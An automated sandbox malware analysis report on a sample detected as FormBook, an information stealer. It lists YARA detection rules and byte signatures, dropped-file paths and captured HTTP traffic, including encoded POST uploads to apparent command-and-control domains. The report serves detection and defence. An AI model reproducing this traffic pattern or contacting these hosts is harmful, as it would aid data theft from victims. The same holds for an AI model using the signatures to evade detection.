Process Memory Space: PO20012ZAS23JULY2020.exe PID: 6908	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x296dbd:$s5: AEAAAAMAAQqVT 0xace7:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x291cb5:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x296d2e:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x2c8c1a:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Process Memory Space: PO20012ZAS23JULY2020.exe PID: 6908	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: tzypqb0hdn.exe PID: 1880	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x1ef94f:$s5: AEAAAAMAAQqVT 0xa6d5:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x30b61:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x1ea847:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x1ef8c0:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Process Memory Space: tzypqb0hdn.exe PID: 1880	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO20012ZAS23JULY2020.exe PID: 7072	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0xaa2f:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x189682:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Process Memory Space: WWAHost.exe PID: 5540	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x15d348:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV 0x1bb936:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Process Memory Space: tzypqb0hdn.exe PID: 1888	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x19693:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Process Memory Space: tzypqb0hdn.exe PID: 5904	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x5ca52:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Click to see the 51 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.PO20012ZAS23JULY2020.exe.560000.0.unpack	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
34.2.tzypqb0hdn.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
34.2.tzypqb0hdn.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x6448:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x66b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11d35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11821:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x11e37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x11faf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x722a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x10a9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7bc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x170a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x180aa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
34.2.tzypqb0hdn.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x149b9:$sqlite3step: 68 34 1C 7B E1 0x14acc:$sqlite3step: 68 34 1C 7B E1 0x149e8:$sqlite3text: 68 38 2A 90 C5 0x14b0d:$sqlite3text: 68 38 2A 90 C5 0x149fb:$sqlite3blob: 68 53 D8 7F 8C 0x14b23:$sqlite3blob: 68 53 D8 7F 8C
1.2.PO20012ZAS23JULY2020.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.PO20012ZAS23JULY2020.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.PO20012ZAS23JULY2020.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x157b9:$sqlite3step: 68 34 1C 7B E1 0x158cc:$sqlite3step: 68 34 1C 7B E1 0x157e8:$sqlite3text: 68 38 2A 90 C5 0x1590d:$sqlite3text: 68 38 2A 90 C5 0x157fb:$sqlite3blob: 68 53 D8 7F 8C 0x15923:$sqlite3blob: 68 53 D8 7F 8C
34.0.tzypqb0hdn.exe.e10000.0.unpack	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
29.2.tzypqb0hdn.exe.c60000.0.unpack	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
1.2.PO20012ZAS23JULY2020.exe.a30000.1.unpack	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
1.2.PO20012ZAS23JULY2020.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.PO20012ZAS23JULY2020.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x6448:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x66b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x11d35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11821:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x11e37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x11faf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x722a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x10a9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7bc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x170a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x180aa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.PO20012ZAS23JULY2020.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x149b9:$sqlite3step: 68 34 1C 7B E1 0x14acc:$sqlite3step: 68 34 1C 7B E1 0x149e8:$sqlite3text: 68 38 2A 90 C5 0x14b0d:$sqlite3text: 68 38 2A 90 C5 0x149fb:$sqlite3blob: 68 53 D8 7F 8C 0x14b23:$sqlite3blob: 68 53 D8 7F 8C
30.2.tzypqb0hdn.exe.90000.0.unpack	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
29.0.tzypqb0hdn.exe.c60000.0.unpack	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
34.2.tzypqb0hdn.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
34.2.tzypqb0hdn.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
34.2.tzypqb0hdn.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x157b9:$sqlite3step: 68 34 1C 7B E1 0x158cc:$sqlite3step: 68 34 1C 7B E1 0x157e8:$sqlite3text: 68 38 2A 90 C5 0x1590d:$sqlite3text: 68 38 2A 90 C5 0x157fb:$sqlite3blob: 68 53 D8 7F 8C 0x15923:$sqlite3blob: 68 53 D8 7F 8C
1.0.PO20012ZAS23JULY2020.exe.a30000.0.unpack	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
31.0.tzypqb0hdn.exe.7f0000.0.unpack	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
30.0.tzypqb0hdn.exe.90000.0.unpack	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
34.2.tzypqb0hdn.exe.e10000.1.unpack	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
0.2.PO20012ZAS23JULY2020.exe.560000.0.unpack	SUSP_Reversed_Base64_Encoded_EXE	Detects an base64 encoded executable with reversed characters	Florian Roth	0x68159:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Click to see the 18 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.243951607.00000000039DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.486023523.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.487779904.0000000001340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.322786943.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.476866137.000000000406B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.323161625.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.485232592.000000000356B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.491846641.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.322548757.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.488951197.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.492090705.0000000003350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 34.2.tzypqb0hdn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.PO20012ZAS23JULY2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.PO20012ZAS23JULY2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.tzypqb0hdn.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Yulx\tzypqb0hdn.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: PO20012ZAS23JULY2020.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 4x nop then pop edi	1_2_00415092
Source: C:\Users\user\Desktop\PO20012ZAS23JULY2020.exe	Code function: 4x nop then pop ebx	1_2_004053FD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 4x nop then pop ebx	14_2_02EA53FD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 4x nop then pop edi	14_2_02EB40D2
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 4x nop then pop edi	14_2_02EB5092

Source: global traffic	HTTP traffic detected: GET /te/?yVMtQJ-H=M2ouDOfM+T3zzgjgUubsisyNcixzNrb8Dit4zcLuso93p7KAZYRDmlVUuOCulIdCUmxN&1bw=L6AdjD8PkTAxfLfP HTTP/1.1Host: www.flycoz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /te/?yVMtQJ-H=YnugSmClBUvUXRLPCsbxw2OmDb905VN+Y96E/JPBbQ+aTaf+Ffi3sFUNGeaIcyR/+Sbw&1bw=L6AdjD8PkTAxfLfP HTTP/1.1Host: www.inmoregistrocanarias.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	HTTP traffic detected: POST /te/ HTTP/1.1Host: www.inmoregistrocanarias.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.inmoregistrocanarias.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.inmoregistrocanarias.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 56 4d 74 51 4a 2d 48 3d 51 46 69 61 4d 42 47 79 4b 47 4c 57 50 51 7e 62 66 61 53 78 76 7a 75 31 42 75 4e 45 31 58 4e 33 50 59 61 48 70 49 54 68 58 79 6d 42 56 70 44 5a 4c 39 4b 5f 71 6c 42 79 59 50 47 44 44 53 42 45 38 51 71 30 69 57 47 5f 68 37 4b 31 67 53 39 42 6f 2d 35 6e 30 67 73 65 7e 32 51 46 59 5f 4f 65 55 43 54 51 62 48 6b 47 46 52 68 2d 6b 34 7e 7a 74 65 51 70 46 32 66 56 71 46 41 5a 7a 6f 53 32 51 75 69 4d 71 45 38 4f 36 79 56 59 30 50 4b 36 72 5f 62 52 67 4c 50 31 54 68 78 73 35 32 52 79 6b 48 76 37 7e 47 38 77 43 69 7a 64 6c 6d 69 35 76 43 67 78 78 5f 4f 68 6e 78 58 36 44 6d 6d 6e 68 77 38 55 63 75 30 4e 77 69 51 6e 55 77 67 41 6b 64 69 78 63 55 41 76 57 4b 62 72 74 44 4c 53 48 52 66 30 4d 62 6f 4c 72 4b 53 67 61 49 77 6c 65 4d 72 31 66 73 54 65 7e 4a 4a 35 68 75 53 33 64 52 33 49 46 49 70 38 39 47 72 78 32 68 54 39 74 65 4b 5f 58 69 54 75 49 6b 56 51 7e 71 42 37 47 56 76 42 50 39 32 48 71 66 75 70 79 55 64 4e 74 41 4f 62 41 6e 4a 35 6c 61 4d 67 6e 4a 61 6a 71 4e 4e 77 49 49 73 69 71 41 6f 6d 36 41 7a 62 68 48 64 76 61 72 78 6a 4e 33 47 75 47 45 44 6a 47 6a 72 52 45 31 46 71 77 71 72 4d 4f 7a 77 6c 36 78 59 2d 47 70 59 50 71 6b 45 4c 4c 7a 5a 35 73 32 69 76 5a 78 64 2d 73 74 61 72 4c 6b 47 5a 67 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: yVMtQJ-H=QFiaMBGyKGLWPQ~bfaSxvzu1BuNE1XN3PYaHpIThXymBVpDZL9K_qlByYPGDDSBE8Qq0iWG_h7K1gS9Bo-5n0gse~2QFY_OeUCTQbHkGFRh-k4~zteQpF2fVqFAZzoS2QuiMqE8O6yVY0PK6r_bRgLP1Thxs52RykHv7~G8wCizdlmi5vCgxx_OhnxX6Dmmnhw8Ucu0NwiQnUwgAkdixcUAvWKbrtDLSHRf0MboLrKSgaIwleMr1fsTe~JJ5huS3dR3IFIp89Grx2hT9teK_XiTuIkVQ~qB7GVvBP92HqfupyUdNtAObAnJ5laMgnJajqNNwIIsiqAom6AzbhHdvarxjN3GuGEDjGjrRE1FqwqrMOzwl6xY-GpYPqkELLzZ5s2ivZxd-starLkGZgA).
Source: global traffic	HTTP traffic detected: POST /te/ HTTP/1.1Host: www.inmoregistrocanarias.comConnection: closeContent-Length: 145218Cache-Control: no-cacheOrigin: http://www.inmoregistrocanarias.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.inmoregistrocanarias.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 56 4d 74 51 4a 2d 48 3d 51 46 69 61 4d 41 4f 49 4d 32 66 44 4c 6d 57 61 65 4b 43 70 72 77 47 6a 4b 49 46 54 37 55 74 46 41 59 33 61 70 4c 4c 6c 62 54 32 66 44 35 7a 5a 4e 2d 69 68 7e 56 42 31 51 76 47 41 48 53 4e 4b 31 67 7a 37 69 55 72 51 68 37 43 32 71 30 35 5a 6f 75 35 4f 31 41 77 69 34 32 45 4f 59 38 71 33 55 67 66 59 51 6e 6f 47 42 68 4a 38 72 36 48 33 6f 71 49 63 4c 6e 7a 55 6d 68 55 51 7a 62 6d 4f 57 4e 65 36 70 46 67 41 28 42 4a 54 6f 62 4f 43 76 6f 28 4b 6b 61 28 79 50 32 67 6d 39 52 42 2d 6e 47 76 4a 78 6d 51 5f 63 69 62 44 31 78 65 78 6b 57 34 69 33 76 65 54 6e 32 4c 45 4c 30 69 32 33 43 49 4d 50 71 6b 7a 6b 6e 31 68 4b 78 67 49 67 66 4b 4d 61 55 52 4e 61 6f 79 33 6f 53 6a 48 41 54 6e 6b 52 4a 59 77 34 72 65 6b 43 70 67 52 66 5f 47 34 64 74 43 4d 77 6f 42 75 72 65 79 76 65 54 62 79 49 49 6f 61 37 47 72 39 7e 78 53 64 6f 2d 7e 67 57 53 44 44 49 6d 30 5a 32 5a 46 6d 46 58 62 42 4b 63 6e 6b 35 37 4b 74 36 46 73 36 70 44 43 41 48 52 74 43 6d 61 4e 5f 6e 50 32 73 71 4e 4d 44 49 4a 74 33 73 31 49 6d 35 77 53 64 6e 68 56 6a 63 72 77 6a 4f 6e 57 6f 66 44 43 6b 47 6a 7a 52 43 41 35 41 32 5a 4c 4d 4b 69 41 6d 36 55 30 2d 4b 35 59 50 73 6b 46 71 49 69 38 6a 70 6c 58 58 51 78 74 33 6c 70 28 62 42 51 48 44 31 62 6b 45 61 59 68 6f 58 36 6c 54 75 76 65 69 67 77 6d 6d 47 7a 44 2d 59 32 30 7a 63 47 35 45 62 30 70 77 4a 77 52 72 45 44 65 69 51 37 66 53 6f 30 57 6f 50 64 4d 5f 73 78 4e 32 6f 70 68 64 4c 67 37 68 6d 5a 6d 76 73 44 44 58 31 45 57 44 62 46 36 2d 69 65 79 32 49 39 39 74 44 35 57 78 78 35 6f 31 28 32 42 79 78 4d 64 74 6a 48 73 48 61 4c 48 78 75 76 61 58 65 4e 28 6f 43 63 55 65 51 37 28 66 43 30 73 5a 77 6a 55 42 38 4d 55 52 65 4e 59 74 35 58 61 5f 6a 6d 72 58 52 77 63 6d 54 51 4a 4c 6c 39 37 46 39 72 6b 79 64 66 43 41 79 64 51 58 4a 6f 70 48 62 55 36 6c 68 73 61 2d 48 6e 39 6d 76 34 73 34 28 65 49 30 42 66 51 79 75 51 42 7a 57 38 4a 32 70 63 75 38 55 42 67 4f 5a 58 49 6e 50 65 6d 46 76 42 66 32 77 64 35 38 76 36 32 6b 43 72 63 34 4e 5f 65 63 57 6a 46 6b 78 7a 45 34 68 67 45 63 28 36 33 49 64 73 61 38 4f 56 34 33 68 77 6c 33 66 69 7e 6b 33 65 59 36 43 75 6e 6f 63 45 65 69 4c 37 48 62 6d 56 4a 69 6a 72 4d 66 7e 4f 43 62 70 43 61 33 32 34 37 4a 62 46 55 75 41 5a 4b 34 66 54 69 46 62 6a 47 4b 75 6c 79 39 67 47 66 50 43 56 4d 46 73 34 39 64 70 6f 4c 76 74 71 32 5a 4b 50 77 72 5a 66 45 51 4b 6a 79 51 72 5f 4e 62 67 59 70 39 52 4b 4f 48 71 33 28 31 47 57 57 73 31 62 50 75 68 67 51 58 54 6c 52 57 31 39 43 54 67 46 49 47 59 43 72 38 6e 34 50 4f 47 46 33 4c 51 4e 35 72 6b 54 77 4c 57 33 46 33 6f 66 63 58 7a 5a 65 68 68 61

Source: global traffic	HTTP traffic detected: GET /te/?yVMtQJ-H=M2ouDOfM+T3zzgjgUubsisyNcixzNrb8Dit4zcLuso93p7KAZYRDmlVUuOCulIdCUmxN&1bw=L6AdjD8PkTAxfLfP HTTP/1.1Host: www.flycoz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /te/?yVMtQJ-H=YnugSmClBUvUXRLPCsbxw2OmDb905VN+Y96E/JPBbQ+aTaf+Ffi3sFUNGeaIcyR/+Sbw&1bw=L6AdjD8PkTAxfLfP HTTP/1.1Host: www.inmoregistrocanarias.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: unknown

DNS traffic detected: queries for: g.msn.com

Source: unknown

HTTP traffic detected: POST /te/ HTTP/1.1Host: www.inmoregistrocanarias.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.inmoregistrocanarias.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.inmoregistrocanarias.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 56 4d 74 51 4a 2d 48 3d 51 46 69 61 4d 42 47 79 4b 47 4c 57 50 51 7e 62 66 61 53 78 76 7a 75 31 42 75 4e 45 31 58 4e 33 50 59 61 48 70 49 54 68 58 79 6d 42 56 70 44 5a 4c 39 4b 5f 71 6c 42 79 59 50 47 44 44 53 42 45 38 51 71 30 69 57 47 5f 68 37 4b 31 67 53 39 42 6f 2d 35 6e 30 67 73 65 7e 32 51 46 59 5f 4f 65 55 43 54 51 62 48 6b 47 46 52 68 2d 6b 34 7e 7a 74 65 51 70 46 32 66 56 71 46 41 5a 7a 6f 53 32 51 75 69 4d 71 45 38 4f 36 79 56 59 30 50 4b 36 72 5f 62 52 67 4c 50 31 54 68 78 73 35 32 52 79 6b 48 76 37 7e 47 38 77 43 69 7a 64 6c 6d 69 35 76 43 67 78 78 5f 4f 68 6e 78 58 36 44 6d 6d 6e 68 77 38 55 63 75 30 4e 77 69 51 6e 55 77 67 41 6b 64 69 78 63 55 41 76 57 4b 62 72 74 44 4c 53 48 52 66 30 4d 62 6f 4c 72 4b 53 67 61 49 77 6c 65 4d 72 31 66 73 54 65 7e 4a 4a 35 68 75 53 33 64 52 33 49 46 49 70 38 39 47 72 78 32 68 54 39 74 65 4b 5f 58 69 54 75 49 6b 56 51 7e 71 42 37 47 56 76 42 50 39 32 48 71 66 75 70 79 55 64 4e 74 41 4f 62 41 6e 4a 35 6c 61 4d 67 6e 4a 61 6a 71 4e 4e 77 49 49 73 69 71 41 6f 6d 36 41 7a 62 68 48 64 76 61 72 78 6a 4e 33 47 75 47 45 44 6a 47 6a 72 52 45 31 46 71 77 71 72 4d 4f 7a 77 6c 36 78 59 2d 47 70 59 50 71 6b 45 4c 4c 7a 5a 35 73 32 69 76 5a 78 64 2d 73 74 61 72 4c 6b 47 5a 67 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: yVMtQJ-H=QFiaMBGyKGLWPQ~bfaSxvzu1BuNE1XN3PYaHpIThXymBVpDZL9K_qlByYPGDDSBE8Qq0iWG_h7K1gS9Bo-5n0gse~2QFY_OeUCTQbHkGFRh-k4~zteQpF2fVqFAZzoS2QuiMqE8O6yVY0PK6r_bRgLP1Thxs52RykHv7~G8wCizdlmi5vCgxx_OhnxX6Dmmnhw8Ucu0NwiQnUwgAkdixcUAvWKbrtDLSHRf0MboLrKSgaIwleMr1fsTe~JJ5huS3dR3IFIp89Grx2hT9teK_XiTuIkVQ~qB7GVvBP92HqfupyUdNtAObAnJ5laMgnJajqNNwIIsiqAom6AzbhHdvarxjN3GuGEDjGjrRE1FqwqrMOzwl6xY-GpYPqkELLzZ5s2ivZxd-starLkGZgA).

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 31 Jul 2020 06:14:32 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 326Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te/ was not found on this 